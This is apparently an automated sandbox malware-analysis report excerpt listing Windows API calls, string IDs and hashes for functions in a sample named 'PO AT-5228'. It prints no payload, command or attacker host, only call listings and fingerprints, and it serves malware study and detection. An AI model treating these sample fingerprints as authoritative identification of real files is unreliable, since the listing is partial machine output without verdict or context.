                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf_xtow@16
                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                        • API String ID: 1502193981-2263619337
                                                                                        • Opcode ID: d54b7634ff6a0697907b712b469cb00f4fdd9da0d0e30e111e56a7d6e3ccc358
                                                                                        • Instruction ID: beeb59fd7309666418f33ae8490876fb31584ec41c5bf103b06892daba456b28
                                                                                        • Opcode Fuzzy Hash: d54b7634ff6a0697907b712b469cb00f4fdd9da0d0e30e111e56a7d6e3ccc358
                                                                                        • Instruction Fuzzy Hash: 4141D472515205EBDB24EB78D982EBAB7E8EB44300F2444EBE14AD73D1EA35A941CB14
                                                                                        APIs
                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BCA259
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00BCA260
                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BCA273
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00BCA27B
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BCA286
                                                                                        • DeleteDC.GDI32(00000000), ref: 00BCA28F
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00BCA299
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00BCA2AD
                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00BCA2B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                        • String ID: static
                                                                                        • API String ID: 2559357485-2160076837
                                                                                        • Opcode ID: 058f5c9b0ede18a48417596c284888f3a4a88e7da733c22418804d0312cd9d9e
                                                                                        • Instruction ID: b39bc410cff917f22ccfb84bc295baf8dd95bf9928111b1455afd6822a858bdb
                                                                                        • Opcode Fuzzy Hash: 058f5c9b0ede18a48417596c284888f3a4a88e7da733c22418804d0312cd9d9e
                                                                                        • Instruction Fuzzy Hash: DF319E31100118AFDF215FA4DC89FEA3BA9FF09364F100218FA19AA0E0CB75D811DBA5
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                        • String ID: 0.0.0.0
                                                                                        • API String ID: 2620052-3771769585
                                                                                        • Opcode ID: cdc46477a853d83ddcb26a5d6cbc3a842eb456a04bf3cd65a9eaeee1e410241a
                                                                                        • Instruction ID: 528d610983690e2e2299919977ea3e9cd2311680c2f4a403820ba0a22b799d0c
                                                                                        • Opcode Fuzzy Hash: cdc46477a853d83ddcb26a5d6cbc3a842eb456a04bf3cd65a9eaeee1e410241a
                                                                                        • Instruction Fuzzy Hash: BC11D2B2508115AFCB24BB60AC4AEDA77E8EF41710F0400E5F505AB091EEB1EE858B50
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B85047
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        • __gmtime64_s.LIBCMT ref: 00B850E0
                                                                                        • __gmtime64_s.LIBCMT ref: 00B85116
                                                                                        • __gmtime64_s.LIBCMT ref: 00B85133
                                                                                        • __allrem.LIBCMT ref: 00B85189
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B851A5
                                                                                        • __allrem.LIBCMT ref: 00B851BC
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B851DA
                                                                                        • __allrem.LIBCMT ref: 00B851F1
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B8520F
                                                                                        • __invoke_watson.LIBCMT ref: 00B85280
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                        • String ID:
                                                                                        • API String ID: 384356119-0
                                                                                        • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                        • Instruction ID: 4a81141b2ebc42801f879746eacd424d998f355e708d1da62ccd1773b9dfa3af
                                                                                        • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                        • Instruction Fuzzy Hash: 9D71C775A01B17ABDB24BE78CC81BAAB3E8EF04764F1442B9F510D6291EB70D940CBD0
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BA4DF8
                                                                                        • GetMenuItemInfoW.USER32(00C21708,000000FF,00000000,00000030), ref: 00BA4E59
                                                                                        • SetMenuItemInfoW.USER32(00C21708,00000004,00000000,00000030), ref: 00BA4E8F
                                                                                        • Sleep.KERNEL32(000001F4), ref: 00BA4EA1
                                                                                        • GetMenuItemCount.USER32(?), ref: 00BA4EE5
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00BA4F01
                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00BA4F2B
                                                                                        • GetMenuItemID.USER32(?,?), ref: 00BA4F70
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BA4FB6
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BA4FCA
                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BA4FEB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4176008265-0
                                                                                        • Opcode ID: 69623f3f74ca4d0fb6387835008533dd563773972815e21e92285069d49861e1
                                                                                        • Instruction ID: d68b35700fbf13a87b3d9f0cc95a3711ee5425419c7bbecaff93a2df79746ac9
                                                                                        • Opcode Fuzzy Hash: 69623f3f74ca4d0fb6387835008533dd563773972815e21e92285069d49861e1
                                                                                        • Instruction Fuzzy Hash: C361A271908289AFDF21CF68DC84EAE7BF8FB82304F140599F945A7251D7B2AD05CB21
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BC9C98
                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BC9C9B
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BC9CBF
                                                                                        • _memset.LIBCMT ref: 00BC9CD0
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BC9CE2
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BC9D5A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 830647256-0
                                                                                        • Opcode ID: 35144d7a6885523f0a3ef75b28bb22ba0f4a3a6ba1af96dd703b187d2b430d25
                                                                                        • Instruction ID: da9cf3cc203451c8efdfe07105997886df2ce3600cf29046a3797f3016197244
                                                                                        • Opcode Fuzzy Hash: 35144d7a6885523f0a3ef75b28bb22ba0f4a3a6ba1af96dd703b187d2b430d25
                                                                                        • Instruction Fuzzy Hash: AF616B75900248AFEB20DFA4CC85FEE77F8EB09714F1441A9FA05E72A1D770A946DB50
                                                                                        APIs
                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00B994FE
                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00B99549
                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9955B
                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00B9957B
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00B995BE
                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00B995D2
                                                                                        • VariantClear.OLEAUT32(?), ref: 00B995E7
                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00B995F4
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B995FD
                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9960F
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B9961A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                        • String ID:
                                                                                        • API String ID: 2706829360-0
                                                                                        • Opcode ID: 441044d758ba8a86697b089120964ee3d5d0f3c47918a88a05e98727c8833660
                                                                                        • Instruction ID: c1414c7a5875d652621a87e8bd402ae926aec40efeca81559dcf92428f476bc1
                                                                                        • Opcode Fuzzy Hash: 441044d758ba8a86697b089120964ee3d5d0f3c47918a88a05e98727c8833660
                                                                                        • Instruction Fuzzy Hash: 41412E31900219AFCF01EFA8D8849DEBBB9FF18354F0180A9E515E7261DB71EA45CBA1
                                                                                        APIs
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                        • CoInitialize.OLE32 ref: 00BBADF6
                                                                                        • CoUninitialize.OLE32 ref: 00BBAE01
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00BED8FC,?), ref: 00BBAE61
                                                                                        • IIDFromString.OLE32(?,?), ref: 00BBAED4
                                                                                        • VariantInit.OLEAUT32(?), ref: 00BBAF6E
                                                                                        • VariantClear.OLEAUT32(?), ref: 00BBAFCF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                        • API String ID: 834269672-1287834457
                                                                                        • Opcode ID: e510a0d63d1ace6b0210d0a2753683ed1917c6ddb17c808f7b7d4812d689eddf
                                                                                        • Instruction ID: 5e08d3d0fcd0d6be4c02d00ff5b60c27b3de3712cde156d5e6f5c0dea686b1c2
                                                                                        • Opcode Fuzzy Hash: e510a0d63d1ace6b0210d0a2753683ed1917c6ddb17c808f7b7d4812d689eddf
                                                                                        • Instruction Fuzzy Hash: F0617971A08301AFD710DF54C888BBABBE8EF49714F144899F9859B291C7B0ED44CB93
                                                                                        APIs
                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00BB8168
                                                                                        • inet_addr.WSOCK32(?,?,?), ref: 00BB81AD
                                                                                        • gethostbyname.WSOCK32(?), ref: 00BB81B9
                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00BB81C7
                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BB8237
                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00BB824D
                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00BB82C2
                                                                                        • WSACleanup.WSOCK32 ref: 00BB82C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                        • String ID: Ping
                                                                                        • API String ID: 1028309954-2246546115
                                                                                        • Opcode ID: 5e3c68b52fffca641bf6382017c2ce0f21c045f546c9f87ad1a8e8b703f109cb
                                                                                        • Instruction ID: 9409a8ecd7af8e79219c975bf6bf295034cc236f2921da5c9c2adfb749335f4c
                                                                                        • Opcode Fuzzy Hash: 5e3c68b52fffca641bf6382017c2ce0f21c045f546c9f87ad1a8e8b703f109cb
                                                                                        • Instruction Fuzzy Hash: 555181316046009FD7119F64DC85BBABBE9EF48310F0489A9F959EB2A1DFB4ED05CB42
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00BAE396
                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00BAE40C
                                                                                        • GetLastError.KERNEL32 ref: 00BAE416
                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00BAE483
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                        • API String ID: 4194297153-14809454
                                                                                        • Opcode ID: ec66c2ded2795397447dbd827f060533a8d7c1a7a22ffbec003e2b719023fbad
                                                                                        • Instruction ID: c672eb9f4b68c3134f948b56dddcecbcc72db30c4ca1d4c6eff5db2fecb38213
                                                                                        • Opcode Fuzzy Hash: ec66c2ded2795397447dbd827f060533a8d7c1a7a22ffbec003e2b719023fbad
                                                                                        • Instruction Fuzzy Hash: 1F319035A042099FDB01EB68C895ABDBBF8EF0A304F1480A5E515EB391DF70DA42CB91
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00B9B98C
                                                                                        • GetDlgCtrlID.USER32 ref: 00B9B997
                                                                                        • GetParent.USER32 ref: 00B9B9B3
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B9B9B6
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00B9B9BF
                                                                                        • GetParent.USER32(?), ref: 00B9B9DB
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B9B9DE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1383977212-1403004172
                                                                                        • Opcode ID: 3cf4da28855e5e5284e3401991cb8163d3c18b59f01e9207097eec3425a51a3a
                                                                                        • Instruction ID: 4b06960757b263eb3848ec3e01318a63e289696fa3a551a4191f6c0b93d7f4e3
                                                                                        • Opcode Fuzzy Hash: 3cf4da28855e5e5284e3401991cb8163d3c18b59f01e9207097eec3425a51a3a
                                                                                        • Instruction Fuzzy Hash: 5921A174900108AFDF04ABA4DCC6EFEBBB5EF4A300B100169F661972A1DBB958159B20
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00B9BA73
                                                                                        • GetDlgCtrlID.USER32 ref: 00B9BA7E
                                                                                        • GetParent.USER32 ref: 00B9BA9A
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B9BA9D
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00B9BAA6
                                                                                        • GetParent.USER32(?), ref: 00B9BAC2
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B9BAC5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1383977212-1403004172
                                                                                        • Opcode ID: a5b949477ec4608496cafd2344c9decef21d04093bc5a0f6b43169e6488ee80e
                                                                                        • Instruction ID: 60356d6990210c55b4d46d841674e7393cd4f1a8e24c03e036ba2c55ff3f332c
                                                                                        • Opcode Fuzzy Hash: a5b949477ec4608496cafd2344c9decef21d04093bc5a0f6b43169e6488ee80e
                                                                                        • Instruction Fuzzy Hash: CA21C2B4A00108BFDF00ABA4DC85EFEBBB9EF45300F100165F551A71A1DFB95919AB20
                                                                                        APIs
                                                                                        • GetParent.USER32 ref: 00B9BAE3
                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00B9BAF8
                                                                                        • _wcscmp.LIBCMT ref: 00B9BB0A
                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B9BB85
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                        • API String ID: 1704125052-3381328864
                                                                                        • Opcode ID: baba95a35e88e07f8f57bd24f078e00a596a33346160e4a9756cf8060fec7694
                                                                                        • Instruction ID: ea335c710df48db851db3d1af2431e93b4d67f3006b1e104a69f2c3e545d0866
                                                                                        • Opcode Fuzzy Hash: baba95a35e88e07f8f57bd24f078e00a596a33346160e4a9756cf8060fec7694
                                                                                        • Instruction Fuzzy Hash: 1511067A648307FEFE247624FC46DE637DCDF12764B2000B2FA04E50E5EFA16861A614
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00BBB2D5
                                                                                        • CoInitialize.OLE32(00000000), ref: 00BBB302
                                                                                        • CoUninitialize.OLE32 ref: 00BBB30C
                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00BBB40C
                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00BBB539
                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00BBB56D
                                                                                        • CoGetObject.OLE32(?,00000000,00BED91C,?), ref: 00BBB590
                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00BBB5A3
                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00BBB623
                                                                                        • VariantClear.OLEAUT32(00BED91C), ref: 00BBB633
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 2395222682-0
                                                                                        • Opcode ID: c8fb0c038d02fc3fbdefa1207eda76e763cabc180b418966deafbd3857905cd4
                                                                                        • Instruction ID: 71f194046182b23f972a40f5bbcfa1a8c1973ba05817782a218786608d78b1c2
                                                                                        • Opcode Fuzzy Hash: c8fb0c038d02fc3fbdefa1207eda76e763cabc180b418966deafbd3857905cd4
                                                                                        • Instruction Fuzzy Hash: 0FC10371608345AFCB00DF69C894D6AB7E9FF88304F0449ADF58A9B251DBB1ED05CB52
